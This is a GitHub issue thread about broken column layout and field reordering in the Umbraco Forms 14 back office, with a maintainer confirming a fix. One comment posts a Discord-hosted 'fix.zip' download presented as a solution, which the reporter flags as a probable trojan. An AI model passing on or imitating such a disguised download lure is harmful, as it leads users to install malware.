### ISSUE TITLE
In Umbraco 14.2.0 and Umbraco Forms 14.1.1, the ability to add columns to groups is broken in the UI

### ISSUE THREAD

**Issue by Jollus174** [umbraco/Umbraco.Forms.Issues#1290]
When attempting to create a form group with columns, this functionality seems busted in the UI.

![image](https://github.com/user-attachments/assets/3f9d7c95-7ee8-4072-ac48-c9f74f18ba44)

![image](https://github.com/user-attachments/assets/1373a492-40f9-45ca-91b9-e41259bcba97)

![image](https://github.com/user-attachments/assets/82cff4c6-ca5a-46e9-9687-0a7b467653f0)

Since I can't shift a field between columns, the Forms Delivery API puts both fields in the same column.

![image](https://github.com/user-attachments/assets/3c3b4549-5e18-4242-8e6c-53d67902268d)

In Umbraco Form 13, this was working in the UI.

![image](https://github.com/user-attachments/assets/8201d0ae-602b-4cf2-bb09-f8e5a01d500a)

---
_This item has been added to our backlog AB#43634_

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Jollus174** [comment]
@zawa999 Going by your account activity and the lack of explanation, I'm pretty sure that's a trojan. 🤖

**Comment by DeanRITS** [comment]
Hi, I had a similar issue in Umbraco Forms v13

Within the default theme there is a "Form.cshtml" file that is responsible for rendering the form inputs. 

 ```
 @foreach (FieldsetViewModel fs in Model.CurrentPage.Fieldsets)
  {
      bool hideFieldSetWhenRendering = fs.HasCondition && fs.ConditionActionType == FieldConditionActionType.Show;

      <fieldset class="umbraco-forms-fieldset@{ if (hideFieldSetWhenRendering) { <text> umbraco-forms-hidden</text>  } }" id="@fs.Id">

          @if (string.IsNullOrEmpty(fs.Caption) == false)
          {
              <legend>@fs.Caption</legend>
          }

          <div class="row-fluid">

              @foreach (var c in fs.Containers)
              {
              ...
```

You can see there is a div that wraps each container with a class of "row-fluid". I think row-fluid could be from an older version of bootstrap

I changed this to just "row" and my columns started working.

Hope this helps,
Dean

**Comment by Jollus174** [comment]
Thanks Dean. I think there's a misunderstanding though - this issue doesn't involve themes rendered in the front end. We actually use the Forms API to render our forms. Editing `Forms.cshtml` wouldn't solve this problem, since we aren't using it.

This issue is exists in Umbraco 14 Back Office.

For example, another issue is that Umbraco Forms 13 allows forms to be re-ordered into different columns.

![image](https://github.com/user-attachments/assets/5d3e0ca3-8670-4260-8f1d-f5ff7ac77e00)

In Umbraco Forms 14, this feature seems to have disappeared.

![image](https://github.com/user-attachments/assets/8b90d3bf-7173-4370-a5e3-2e18769e03bb)

**Comment by AndyButland** [comment]
Thanks again for the report on this issue.  The layout problem with the columns has been resolved and will be part of the next patch release.

Currently for ordering form fields in 14, as you say, you can only drag/drop them within the fieldset they are in.  If you want to move them to a different fieldset, you can select this in the field details dialog, and then move the element within the new fieldset.

![image](https://github.com/user-attachments/assets/b169f35c-eff4-4b11-b4a3-6141ba696a48)

It's similar for moving fieldsets within pages.

We are looking to see if we can improve this but as of now that's the way we've been able to get working with the new backoffice implementation.
